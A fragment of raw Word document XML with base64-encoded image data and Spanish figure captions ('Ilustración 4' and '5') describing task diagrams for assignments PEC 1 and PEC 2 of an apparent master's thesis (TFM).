IcCH2CotYsVWje6l8R2dXXGIwV&#10;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&#10;wfZKLXnakQW1SEAWufw/oP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bZqq0q8DAABFCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAK&#10;AAAAAAAAACEAK1jAmTtzAAA7cwAAFAAAAAAAAAAAAAAAAAAVBgAAZHJzL21lZGlhL2ltYWdlMS5w&#10;bmdQSwECLQAUAAYACAAAACEA+Hrv4d8AAAAIAQAADwAAAAAAAAAAAAAAAACCeQAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAjnoAAGRycy9f&#10;cmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAg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9" type="#_x0000_t75" alt="Imagen que contiene Gráfico en cascada&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:30930;height:17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xgUygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvBf/D8oTe2k0bEyV2W0SQVi/F6sXbM/uaBLNvQ/Y1jf56VxB6HGbmG2a1GV2rBupD49nAYp6A&#10;Ii69bbgy8P72NLsDFQTZYuuZDHxTgM36arLCwvozv9JwkEpFCIcCDdQiXaF1KGtyGOa+I47e0fcO&#10;Jcq+0rbHc4S7Vi+TJNcOG44LNXb0WFP5dTg5A1V6TPj25Uc/b0Uk/8yy/ceQGTO9Hh/uQQmNcgn/&#10;t3fWQCQu05t0kafw9yn+Ab3+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF63GBTKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:imagedata r:id="rId94" o:title="Imagen que contiene Gráfico en cascada&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:32087;top:6297;width:2622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FmyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9PS8Mw&#10;FL8LfofwBC+ypbOluLpsjKGgXoZ1l90ezVtTbV5Kkm712xtB8Ph+/99qM9lenMmHzrGCxTwDQdw4&#10;3XGr4PDxPHsAESKyxt4xKfimAJv19dUKK+0u/E7nOrYihXCoUIGJcaikDI0hi2HuBuLEnZy3GNPp&#10;W6k9XlK47eV9lpXSYsepweBAO0PNVz1aBfviuDd34+npbVvk/vUw7srPtlbq9mbaPoKINMV/8Z/7&#10;Raf5y2xZLoo8L+H3pwSAXP8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEARwsxZskAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="34494E92" w14:textId="7450C009" w:rsidR="007B14FB" w:rsidRPr="00332291" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>4</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="16" w:name="_Toc155782571"/>
                        <w:r w:rsidRPr="002B54E4">
                          <w:t>Tareas relativas a la PEC 1 del TFM.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="16"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009F6921" w:rsidRPr="009F6921">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Relativo al reto/PEC 1 se establece el siguiente diagrama:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1EBF4D" w14:textId="3435DCF2" w:rsidR="009F6921" w:rsidRPr="009F6921" w:rsidRDefault="00487731" w:rsidP="009F6921">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70A6201C" wp14:editId="3A53EFC3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1940883</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5995035" cy="1893570"/>
                <wp:effectExtent l="0" t="0" r="5715" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="902846870" name="Grupo 22"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5995358" cy="1893570"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5995358" cy="1893570"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1190742948" name="Imagen 2" descr="Escala de tiempo&#10;&#10;Descripción generada automáticamente"/>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01950" cy="1893570"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="114565471" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3260739" y="724619"/>
                            <a:ext cx="2734619" cy="283845"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6AAFE74B" w14:textId="63A16DA0" w:rsidR="007B14FB" w:rsidRPr="00437800" w:rsidRDefault="007B14FB" w:rsidP="007B14FB">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                  <w:noProof/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>5</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="17" w:name="_Toc155782572"/>
                              <w:r w:rsidRPr="008C0BDC">
                                <w:t>Tareas relativas a la PEC 2 del TFM.</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0A6201C" id="Grupo 22" o:spid="_x0000_s1031" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:152.85pt;width:472.05pt;height:149.1pt;z-index:251696128;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-width-relative:margin" coordsize="59953,18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cgxZpgMAADwIAAAOAAAAZHJzL2Uyb0RvYy54bWycVdtu2zgQfV+g/0Co&#10;QN8a2bIdR9o4hes0QYCgNZoWfaYpyiIqkVyStpT9m/2G/YT+2B5SknNxF708WB6Sw+HhmTPD8zdt&#10;XZE9N1YouYjGJ6OIcMlULuR2EX3+dPX6LCLWUZnTSkm+iO65jd5cvPjjvNEZT1SpqpwbgiDSZo1e&#10;RKVzOotjy0peU3uiNJdYLJSpqcPQbOPc0AbR6ypORqPTuFEm10Yxbi1mL7vF6CLELwrO3IeisNyR&#10;ahEBmwtfE74b/40vzmm2NVSXgvUw6G+gqKmQOPQQ6pI6SnZGHIWqBTPKqsKdMFXHqigE4+EOuM14&#10;9Ow210btdLjLNmu2+kATqH3G02+HZe/310bf6bUBE43egosw8ndpC1P7f6AkbaDs/kAZbx1hmJyl&#10;6WwyQ5IZ1sZn6WQ270llJZg/2sfKdz/YGQ8Hx0/gaMEy/HoOYB1x8GOtYJfbGR71QeqfilFT83Wn&#10;XyNdmjqxEZVw90F6SIwHJfdrwdamG4DOtSEiBxfjdDSfJukU3EhaQ/o3Nd1ySZKI5NwyaPCdZbSi&#10;GBEneK3Vq5ft8s/wufQOQjPx7V9JsIkbmlNCd07V3/5xgiGedNyL1yPwh3YQqKfoVrGvlki1Kqnc&#10;8qXVKALg8d7xU/cwfIJ/Uwl9JarKp93bPVMA+0xw3yG7E/OlYjuPrqtOwyuQpqQthbYRMRmvNxzs&#10;mJt8DM2gMzgwo42QritF6wx3rPTnF8DxEdg9bpodFgLoB5z+Rhby/VnBJulonM7QCp4J9iA7cGis&#10;u+aqJt4AVmBArmlG97e2RzO49JR2AAIy4PGFhG5mB/YwOuLvlwr2rqSaA4IP+1hh09npbDoHkZ3A&#10;VjuaGxX0hPJUJKS83+MrnLj2rULNHub/h7dJcjqaT9KIoKTnyfR0nHa5GWo+mU/CZKAwOZucTWdB&#10;XEPh/iKDyK2qRD7IzlO7qgzZU7Ts